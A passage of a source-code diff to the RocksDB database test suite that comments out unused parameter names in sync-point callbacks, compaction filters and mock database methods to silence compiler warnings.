   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Options options = CurrentOptions();
@@ -453,7 +454,7 @@ TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) {
   int bg_delete_file = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
+      [&](void* /*arg*/) { bg_delete_file++; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
   Status s;
@@ -546,7 +547,7 @@ TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) {
 
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached",
-      [&](void* arg) {
+      [&](void* /*arg*/) {
         bg_error_set = true;
         GetAllSSTFiles(&total_sst_files_size);
         reached_max_space_on_compaction++;
diff --git a/db/db_tailing_iter_test.cc b/db/db_tailing_iter_test.cc
index d217828db9d..8301d5a92d4 100644
--- a/db/db_tailing_iter_test.cc
+++ b/db/db_tailing_iter_test.cc
@@ -157,10 +157,10 @@ TEST_F(DBTestTailingIterator, TailingIteratorTrimSeekToNext) {
   });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "ForwardIterator::RenewIterators:Null",
-      [&](void* arg) { file_iters_renewed_null = true; });
+      [&](void* /*arg*/) { file_iters_renewed_null = true; });
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "ForwardIterator::RenewIterators:Copy",
-      [&](void* arg) { file_iters_renewed_copy = true; });
+      [&](void* /*arg*/) { file_iters_renewed_copy = true; });
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
   const int num_records = 1000;
   for (int i = 1; i < num_records; ++i) {
@@ -415,7 +415,7 @@ TEST_F(DBTestTailingIterator, TailingIteratorUpperBound) {
   int immutable_seeks = 0;
   rocksdb::SyncPoint::GetInstance()->SetCallBack(
       "ForwardIterator::SeekInternal:Immutable",
-      [&](void* arg) { ++immutable_seeks; });
+      [&](void* /*arg*/) { ++immutable_seeks; });
 
   // Seek to 13. This should not require any immutable seeks.
   rocksdb::SyncPoint::GetInstance()->EnableProcessing();
diff --git a/db/db_test.cc b/db/db_test.cc
index e9840faa042..16d6580bbd3 100644
--- a/db/db_test.cc
+++ b/db/db_test.cc
@@ -231,11 +231,11 @@ TEST_F(DBTest, SkipDelay) {
     std::atomic<int> sleep_count(0);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
         "DBImpl::DelayWrite:Sleep",
-        [&](void* arg) { sleep_count.fetch_add(1); });
+        [&](void* /*arg*/) { sleep_count.fetch_add(1); });
     std::atomic<int> wait_count(0);
     rocksdb::SyncPoint::GetInstance()->SetCallBack(
         "DBImpl::DelayWrite:Wait",
-        [&](void* arg) { wait_count.fetch_add(1); });
+        [&](void* /*arg*/) { wait_count.fetch_add(1); });
     rocksdb::SyncPoint::GetInstance()->EnableProcessing();
 
     WriteOptions wo;
@@ -715,9 +715,9 @@ TEST_F(DBTest, FlushSchedule) {
 namespace {
 class KeepFilter : public CompactionFilter {
  public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     return false;
   }
 
@@ -747,9 +747,9 @@ class KeepFilterFactory : public CompactionFilterFactory {
 class DelayFilter : public CompactionFilter {
  public:
   explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
+  virtual bool Filter(int /*level*/, const Slice& /*key*/,
+                      const Slice& /*value*/, std::string* /*new_value*/,
+                      bool* /*value_changed*/) const override {
     db_test->env_->addon_time_.fetch_add(1000);
     return true;
   }
@@ -764,7 +764,7 @@ class DelayFilterFactory : public CompactionFilterFactory {
  public:
   explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
   virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
+      const CompactionFilter::Context& /*context*/) override {
     return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
   }
 
@@ -2210,17 +2210,17 @@ class ModelDB : public DB {
     return Write(o, &batch);
   }
   using DB::Get;
-  virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* cf,
-                     const Slice& key, PinnableSlice* value) override {
+  virtual Status Get(const ReadOptions& /*options*/, ColumnFamilyHandle* /*cf*/,
+                     const Slice& key, PinnableSlice* /*value*/) override {
     return Status::NotSupported(key);
   }
 
   using DB::MultiGet;
   virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
+      const ReadOptions& /*options*/,
+      const std::vector<ColumnFamilyHandle*>& /*column_family*/,
       const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
+      std::vector<std::string>* /*values*/) override {
     std::vector<Status> s(keys.size(),
                           Status::NotSupported("Not implemented."));
     return s;
@@ -2229,30 +2229,30 @@ class ModelDB : public DB {
 #ifndef ROCKSDB_LITE
   using DB::IngestExternalFile;
   virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) override {
+      ColumnFamilyHandle* /*column_family*/,
+      const std::vector<std::string>& /*external_files*/,
+      const IngestExternalFileOptions& /*options*/) override {
     return Status::NotSupported("Not implemented.");
   }
 
   using DB::GetPropertiesOfAllTables;
   virtual Status GetPropertiesOfAllTables(
-      ColumnFamilyHandle* column_family,
-      TablePropertiesCollection* props) override {
+      ColumnFamilyHandle* /*column_family*/,
+      TablePropertiesCollection* /*props*/) override {
     return Status();
   }
 
   virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) override {
+      ColumnFamilyHandle* /*column_family*/, const Range* /*range*/,
+      std::size_t /*n*/, TablePropertiesCollection* /*props*/) override {
     return Status();
   }
 #endif  // ROCKSDB_LITE
 
   using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
+  virtual bool KeyMayExist(const ReadOptions& /*options*/,
+                           ColumnFamilyHandle* /*column_family*/,
+                           const Slice& /*key*/, std::string* /*value*/,
                            bool* value_found = nullptr) override {
     if (value_found != nullptr) {
       *value_found = false;
@@ -2260,8 +2260,9 @@ class ModelDB : public DB {
     return true;  // Not Supported directly
   }
   using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
+  virtual Iterator* NewIterator(
+      const ReadOptions& options,
+      ColumnFamilyHandle* /*column_family*/) override {
     if (options.snapshot == nullptr) {
       KVMap* saved = new KVMap;
       *saved = map_;
@@ -2273,9 +2274,9 @@ class ModelDB : public DB {
     }
   }
   virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      std::vector<Iterator*>* iterators) override {
+      const ReadOptions& /*options*/,
+      const std::vector<ColumnFamilyHandle*>& /*column_family*/,
+      std::vector<Iterator*>* /*iterators*/) override {
     return Status::NotSupported("Not supported yet");
   }
   virtual const Snapshot* GetSnapshot() override {
@@ -2288,7 +2289,7 @@ class ModelDB : public DB {
     delete reinterpret_cast<const ModelSnapshot*>(snapshot);
   }
 
-  virtual Status Write(const WriteOptions& options,
+  virtual Status Write(const WriteOptions& /*options*/,
                        WriteBatch* batch) override {
     class Handler : public WriteBatch::Handler {
      public:
@@ -2296,7 +2297,8 @@ class ModelDB : public DB {
       virtual void Put(const Slice& key, const Slice& value) override {
         (*map_)[key.ToString()] = value.ToString();
       }
-      virtual void Merge(const Slice& key, const Slice& value) override {
+      virtual void Merge(const Slice& /*key*/,
+                         const Slice& /*value*/) override {
         // ignore merge for now
         // (*map_)[key.ToString()] = value.ToString();
       }
@@ -2310,62 +2312,65 @@ class ModelDB : public DB {
   }
 
   using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override {
+  virtual bool GetProperty(ColumnFamilyHandle* /*column_family*/,
+                           const Slice& /*property*/,
+                           std::string* /*value*/) override {
     return false;
   }
   using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override {
+  virtual bool GetIntProperty(ColumnFamilyHandle* /*column_family*/,
+                              const Slice& /*property*/,
+                              uint64_t* /*value*/) override {
     return false;
   }
   using DB::GetMapProperty;
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, std::string>* value) override {
+  virtual bool GetMapProperty(
+      ColumnFamilyHandle* /*column_family*/, const Slice& /*property*/,
+      std::map<std::string, std::string>* /*value*/) override {
     return false;
   }
   using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) override {
+  virtual bool GetAggregatedIntProperty(const Slice& /*property*/,
+                                        uint64_t* /*value*/) override {
     return false;
   }
   using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
+  virtual void GetApproximateSizes(ColumnFamilyHandle* /*column_family*/,
+                                   const Range* /*range*/, int n,
+                                   uint64_t* sizes,
+                                   uint8_t /*include_flags*/
                                    = INCLUDE_FILES) override {
     for (int i = 0; i < n; i++) {
       sizes[i] = 0;
     }
   }
   using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override {
+  virtual void GetApproximateMemTableStats(
+      ColumnFamilyHandle* /*column_family*/, const Range& /*range*/,
+      uint64_t* const count, uint64_t* const size) override {
    *count = 0;
     *size = 0;
   }
   using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* start, const Slice* end) override {
+  virtual Status CompactRange(const CompactRangeOptions& /*options*/,
+                              ColumnFamilyHandle* /*column_family*/,
+                              const Slice* /*start*/,
+                              const Slice* /*end*/) override {
     return Status::NotSupported("Not supported operation.");
   }
 
   virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options)
+      const std::unordered_map<std::string, std::string>& /*new_options*/)
       override {
     return Status::NotSupported("Not supported operation.");
   }
 
   using DB::CompactFiles;
-  virtual Status CompactFiles(const CompactionOptions& compact_options,
-                              ColumnFamilyHandle* column_family,
-                              const std::vector<std::string>& input_file_names,
-                              const int output_level,
-                              const int output_path_id = -1) override {
+  virtual Status CompactFiles(
+      const CompactionOptions& /*compact_options*/,
+      ColumnFamilyHandle* /*column_family*/,
+      const std::vector<std::string>& /*input_file_names*/,
+      const int /*output_level*/, const int /*output_path_id*/ = -1) override {
     return Status::NotSupported("Not supported operation.");
   }
 
@@ -2378,24 +2383,25 @@ class ModelDB : public DB {
   }
 
   Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override {
+      const std::vector<ColumnFamilyHandle*>& /*column_family_handles*/)
+      override {
     return Status::NotSupported("Not supported operation.");
   }
 
   using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override {
+  virtual int NumberLevels(ColumnFamilyHandle* /*column_family*/) override {
     return 1;
   }
 
   using DB::MaxMemCompactionLevel;
   virtual int MaxMemCompactionLevel(
-      ColumnFamilyHandle* column_family) override {
+      ColumnFamilyHandle* /*column_family*/) override {
     return 1;
   }
 
   using DB::Level0StopWriteTrigger;
   virtual int Level0StopWriteTrigger(
-      ColumnFamilyHandle* column_family) override {
+      ColumnFamilyHandle* /*column_family*/) override {
     return -1;
   }
 
@@ -2404,7 +2410,8 @@ class ModelDB : public DB {
   virtual Env* GetEnv() const override { return nullptr; }
 
   using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override {
+  virtual Options GetOptions(
+      ColumnFamilyHandle* /*column_family*/) const override {
     return options_;
   }
 
@@ -2412,8 +2419,8 @@ class ModelDB : public DB {
   virtual DBOptions GetDBOptions() const override { return options_; }
 
   using DB::Flush;
-  virtual Status Flush(const rocksdb::FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
+  virtual Status Flush(const rocksdb::FlushOptions& /*options*/,
+                       ColumnFamilyHandle* /*column_family*/) override {
     Status ret;
     return ret;
   }
@@ -2423,33 +2430,35 @@ class ModelDB : public DB {
 #ifndef ROCKSDB_LITE
   virtual Status DisableFileDeletions() override { return Status::OK(); }
 
-  virtual Status EnableFileDeletions(bool force) override {
+  virtual Status EnableFileDeletions(bool /*force*/) override {
     return Status::OK();
} - virtual Status GetLiveFiles(std::vector&, uint64_t* size, - bool flush_memtable = true) override { + virtual Status GetLiveFiles(std::vector&, uint64_t* /*size*/, + bool /*flush_memtable*/ = true) override { return Status::OK(); } - virtual Status GetSortedWalFiles(VectorLogPtr& files) override { + virtual Status GetSortedWalFiles(VectorLogPtr& /*files*/) override { return Status::OK(); } - virtual Status DeleteFile(std::string name) override { return Status::OK(); } + virtual Status DeleteFile(std::string /*name*/) override { + return Status::OK(); + } virtual Status GetUpdatesSince( rocksdb::SequenceNumber, unique_ptr*, - const TransactionLogIterator::ReadOptions& read_options = + const TransactionLogIterator::ReadOptions& /*read_options*/ = TransactionLogIterator::ReadOptions()) override { return Status::NotSupported("Not supported in Model DB"); } virtual void GetColumnFamilyMetaData( - ColumnFamilyHandle* column_family, - ColumnFamilyMetaData* metadata) override {} + ColumnFamilyHandle* /*column_family*/, + ColumnFamilyMetaData* /*metadata*/) override {} #endif // ROCKSDB_LITE - virtual Status GetDbIdentity(std::string& identity) const override { + virtual Status GetDbIdentity(std::string& /*identity*/) const override { return Status::OK(); } @@ -3322,7 +3331,7 @@ TEST_F(DBTest, DynamicMemtableOptions) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::DelayWrite:Wait", - [&](void* arg) { sleeping_task_low.WakeUp(); }); + [&](void* /*arg*/) { sleeping_task_low.WakeUp(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); while (!sleeping_task_low.WokenUp() && count < 256) { @@ -4530,7 +4539,7 @@ class DelayedMergeOperator : public MergeOperator { public: explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {} - virtual bool FullMergeV2(const MergeOperationInput& merge_in, + virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, MergeOperationOutput* merge_out) const override { db_test_->env_->addon_time_.fetch_add(1000); merge_out->new_value = ""; @@ -4881,7 +4890,7 @@ TEST_F(DBTest, AutomaticConflictsWithManualCompaction) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction()::Conflict", - [&](void* arg) { callback_count.fetch_add(1); }); + [&](void* /*arg*/) { callback_count.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions croptions; croptions.exclusive_manual_compaction = false; @@ -5080,7 +5089,7 @@ TEST_F(DBTest, HardLimit) { std::atomic callback_count(0); rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait", - [&](void* arg) { + [&](void* /*arg*/) { callback_count.fetch_add(1); sleeping_task_low.WakeUp(); }); @@ -5173,7 +5182,7 @@ TEST_F(DBTest, SoftLimit) { // Only allow one compactin going through. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "BackgroundCallCompaction:0", [&](void* arg) { + "BackgroundCallCompaction:0", [&](void* /*arg*/) { // Schedule a sleeping task. 
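The counters in these tests hook RocksDB's internal sync-point facility (util/sync_point.h, compiled into test builds only): a marker string placed in db code via TEST_SYNC_POINT invokes any std::function<void(void*)> registered under that name. A sketch of the register/enable/disable cycle the tests follow, reusing the "DBImpl::DelayWrite:Wait" marker from the hunks above; the helper function itself is illustrative.

#include <atomic>

#include "util/sync_point.h"  // internal, test-build-only facility

// Hypothetical helper showing the usual lifecycle.
void CountDelayedWrites(std::atomic<int>* wait_count) {
  auto* sp = rocksdb::SyncPoint::GetInstance();
  // Fires whenever execution reaches the "DBImpl::DelayWrite:Wait" marker
  // in the write path.
  sp->SetCallBack("DBImpl::DelayWrite:Wait",
                  [wait_count](void* /*arg*/) { wait_count->fetch_add(1); });
  sp->EnableProcessing();
  // ... exercise the database under write pressure here ...
  sp->DisableProcessing();
  sp->ClearAllCallBacks();
}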
sleeping_task_low.Reset(); env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, diff --git a/db/db_test2.cc b/db/db_test2.cc index aa10789c851..32f2896cd08 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -497,9 +497,9 @@ TEST_F(DBTest2, WalFilterTest) { apply_option_at_record_index_(apply_option_for_record_index), current_record_index_(0) {} - virtual WalProcessingOption LogRecord(const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) const override { + virtual WalProcessingOption LogRecord( + const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) const override { WalFilter::WalProcessingOption option_to_return; if (current_record_index_ == apply_option_at_record_index_) { @@ -873,11 +873,10 @@ TEST_F(DBTest2, WalFilterTestWithColumnFamilies) { cf_name_id_map_ = cf_name_id_map; } - virtual WalProcessingOption LogRecordFound(unsigned long long log_number, - const std::string& log_file_name, - const WriteBatch& batch, - WriteBatch* new_batch, - bool* batch_changed) override { + virtual WalProcessingOption LogRecordFound( + unsigned long long log_number, const std::string& /*log_file_name*/, + const WriteBatch& batch, WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) override { class LogRecordBatchHandler : public WriteBatch::Handler { private: const std::map & cf_log_number_map_; @@ -1212,7 +1211,7 @@ class CompactionStallTestListener : public EventListener { public: CompactionStallTestListener() : compacted_files_cnt_(0) {} - void OnCompactionCompleted(DB* db, const CompactionJobInfo& ci) override { + void OnCompactionCompleted(DB* /*db*/, const CompactionJobInfo& ci) override { ASSERT_EQ(ci.cf_name, "default"); ASSERT_EQ(ci.base_input_level, 0); ASSERT_EQ(ci.compaction_reason, CompactionReason::kLevelL0FilesNum); @@ -1673,7 +1672,7 @@ TEST_F(DBTest2, SyncPointMarker) { std::atomic sync_point_called(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBTest2::MarkedPoint", - [&](void* arg) { sync_point_called.fetch_add(1); }); + [&](void* /*arg*/) { sync_point_called.fetch_add(1); }); // The first dependency enforces Marker can be loaded before MarkedPoint. // The second checks that thread 1's MarkedPoint should be disabled here. @@ -1942,7 +1941,7 @@ TEST_F(DBTest2, AutomaticCompactionOverlapManualCompaction) { // can fit in L2, these 2 files will be moved to L2 and overlap with // the running compaction and break the LSM consistency. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + "CompactionJob::Run():Start", [&](void* /*arg*/) { ASSERT_OK( dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "2"}, {"max_bytes_for_level_base", "1"}})); @@ -2008,7 +2007,7 @@ TEST_F(DBTest2, ManualCompactionOverlapManualCompaction) { // the running compaction and break the LSM consistency. 
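CompactionStallTestListener above implements the public rocksdb::EventListener hook: OnCompactionCompleted() is invoked once per finished compaction with a CompactionJobInfo describing it. A minimal sketch under that contract; the listener class is hypothetical, and only fields the test itself reads (cf_name, base_input_level) are assumed on CompactionJobInfo.

#include <atomic>

#include "rocksdb/listener.h"

// Hypothetical listener for illustration.
class CompactionCounter : public rocksdb::EventListener {
 public:
  // Invoked on a background thread, so shared state is kept atomic
  // (TestCompactionReasonListener later in this patch uses a
  // std::lock_guard for the same reason).
  void OnCompactionCompleted(rocksdb::DB* /*db*/,
                             const rocksdb::CompactionJobInfo& ci) override {
    completed_.fetch_add(1);
    last_base_input_level_.store(ci.base_input_level);
  }
  std::atomic<int> completed_{0};
  std::atomic<int> last_base_input_level_{-1};
};

// Registration:
//   options.listeners.emplace_back(std::make_shared<CompactionCounter>());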
std::atomic flag(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + "CompactionJob::Run():Start", [&](void* /*arg*/) { if (flag.exchange(true)) { // We want to make sure to call this callback only once return; diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..966fec2cf97 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -1127,17 +1127,18 @@ UpdateStatus DBTestBase::updateInPlaceSmallerVarintSize(char* prevValue, } } -UpdateStatus DBTestBase::updateInPlaceLargerSize(char* prevValue, - uint32_t* prevSize, +UpdateStatus DBTestBase::updateInPlaceLargerSize(char* /*prevValue*/, + uint32_t* /*prevSize*/, Slice delta, std::string* newValue) { *newValue = std::string(delta.size(), 'c'); return UpdateStatus::UPDATED; } -UpdateStatus DBTestBase::updateInPlaceNoAction(char* prevValue, - uint32_t* prevSize, Slice delta, - std::string* newValue) { +UpdateStatus DBTestBase::updateInPlaceNoAction(char* /*prevValue*/, + uint32_t* /*prevSize*/, + Slice /*delta*/, + std::string* /*newValue*/) { return UpdateStatus::UPDATE_FAILED; } diff --git a/db/db_test_util.h b/db/db_test_util.h index cd1265e21f1..70cc6fd70a8 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -187,7 +187,7 @@ class SpecialSkipListFactory : public MemTableRepFactory { using MemTableRepFactory::CreateMemTableRep; virtual MemTableRep* CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform* transform, Logger* logger) override { + const SliceTransform* transform, Logger* /*logger*/) override { return new SpecialMemTableRep( allocator, factory_.CreateMemTableRep(compare, allocator, transform, 0), num_entries_flush_); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c6334f8e067..c88bc30c1c9 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -56,9 +56,9 @@ void VerifyCompactionResult( class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, bool* value_changed) const - override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { return false; } @@ -88,9 +88,9 @@ class KeepFilterFactory : public CompactionFilterFactory { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -105,7 +105,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& context) override { + const CompactionFilter::Context& /*context*/) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -522,7 +522,7 @@ TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); 
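KeepFilter and DelayFilter above implement the public rocksdb::CompactionFilter interface, whose Filter() returns true to drop a key during compaction; arguments a filter does not consult keep only their commented-out names, matching the rest of this patch. A minimal sketch under that contract; the filter class is hypothetical, and its value-based predicate mirrors DestroyAllCompactionFilter patched later in this series.

#include <string>

#include "rocksdb/compaction_filter.h"
#include "rocksdb/slice.h"

// Hypothetical filter for illustration.
class DropByValueFilter : public rocksdb::CompactionFilter {
 public:
  bool Filter(int /*level*/, const rocksdb::Slice& /*key*/,
              const rocksdb::Slice& existing_value,
              std::string* /*new_value*/,
              bool* /*value_changed*/) const override {
    // Returning true drops the entry during compaction.
    return existing_value.ToString() == "destroy";
  }
  const char* Name() const override { return "DropByValueFilter"; }
};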
rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -593,23 +593,23 @@ TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) { // Delay every compaction so multiple compactions will happen. std::atomic num_compactions_running(0); std::atomic has_parallel(false); - rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start", - [&](void* arg) { - if (num_compactions_running.fetch_add(1) > 0) { - has_parallel.store(true); - return; - } - for (int nwait = 0; nwait < 20000; nwait++) { - if (has_parallel.load() || num_compactions_running.load() > 1) { - has_parallel.store(true); - break; - } - env_->SleepForMicroseconds(1000); - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "CompactionJob::Run():Start", [&](void* /*arg*/) { + if (num_compactions_running.fetch_add(1) > 0) { + has_parallel.store(true); + return; + } + for (int nwait = 0; nwait < 20000; nwait++) { + if (has_parallel.load() || num_compactions_running.load() > 1) { + has_parallel.store(true); + break; + } + env_->SleepForMicroseconds(1000); + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():End", - [&](void* arg) { num_compactions_running.fetch_add(-1); }); + [&](void* /*arg*/) { num_compactions_running.fetch_add(-1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); options = CurrentOptions(options); @@ -984,7 +984,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { non_trivial_move++; @@ -1030,7 +1030,7 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* arg) { trivial_move++; }); + [&](void* /*arg*/) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) { ASSERT_TRUE(arg != nullptr); diff --git a/db/deletefile_test.cc b/db/deletefile_test.cc index 989c0c4118b..7a480fc4655 100644 --- a/db/deletefile_test.cc +++ b/db/deletefile_test.cc @@ -159,7 +159,7 @@ class DeleteFileTest : public testing::Test { } // An empty job to guard all jobs are processed - static void GuardFinish(void* arg) { + static void GuardFinish(void* /*arg*/) { TEST_SYNC_POINT("DeleteFileTest::GuardFinish"); } }; diff --git a/db/external_sst_file_test.cc b/db/external_sst_file_test.cc index 4a4e82e792d..0187265b6bb 100644 --- a/db/external_sst_file_test.cc +++ b/db/external_sst_file_test.cc @@ -395,8 +395,9 @@ class SstFileWriterCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, - SequenceNumber seq, uint64_t file_size) override { + Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, + EntryType /*type*/, SequenceNumber /*seq*/, + uint64_t /*file_size*/) override { ++count_; return Status::OK(); } @@ -416,7 +417,7 @@ class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory { explicit SstFileWriterCollectorFactory(std::string prefix) : prefix_(prefix), num_created_(0) {} virtual TablePropertiesCollector* 
CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) override { + TablePropertiesCollectorFactory::Context /*context*/) override { num_created_++; return new SstFileWriterCollector(prefix_); } @@ -687,7 +688,7 @@ TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) { DestroyAndReopen(options); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::AddFile:FileCopied", [&](void* arg) { + "DBImpl::AddFile:FileCopied", [&](void* /*arg*/) { ASSERT_OK(Put("aaa", "bbb")); ASSERT_OK(Flush()); ASSERT_OK(Put("aaa", "xxx")); @@ -1126,7 +1127,7 @@ TEST_F(ExternalSSTFileTest, PickedLevelBug) { std::atomic bg_compact_started(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:Start", - [&](void* arg) { bg_compact_started.store(true); }); + [&](void* /*arg*/) { bg_compact_started.store(true); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); @@ -1407,7 +1408,7 @@ TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) { ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6)); // L2 rocksdb::SyncPoint::GetInstance()->SetCallBack( - "CompactionJob::Run():Start", [&](void* arg) { + "CompactionJob::Run():Start", [&](void* /*arg*/) { // fit in L3 but will overlap with compaction so will be added // to L2 but a compaction will trivially move it to L3 // and break LSM consistency @@ -1797,7 +1798,7 @@ TEST_F(ExternalSSTFileTest, FileWithCFInfo) { class TestIngestExternalFileListener : public EventListener { public: - void OnExternalFileIngested(DB* db, + void OnExternalFileIngested(DB* /*db*/, const ExternalFileIngestionInfo& info) override { ingested_files.push_back(info); } diff --git a/db/fault_injection_test.cc b/db/fault_injection_test.cc index adfcb4db5a7..81ffae925a9 100644 --- a/db/fault_injection_test.cc +++ b/db/fault_injection_test.cc @@ -463,10 +463,10 @@ TEST_P(FaultInjectionTest, UninstalledCompaction) { std::atomic opened(false); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::Open:Opened", 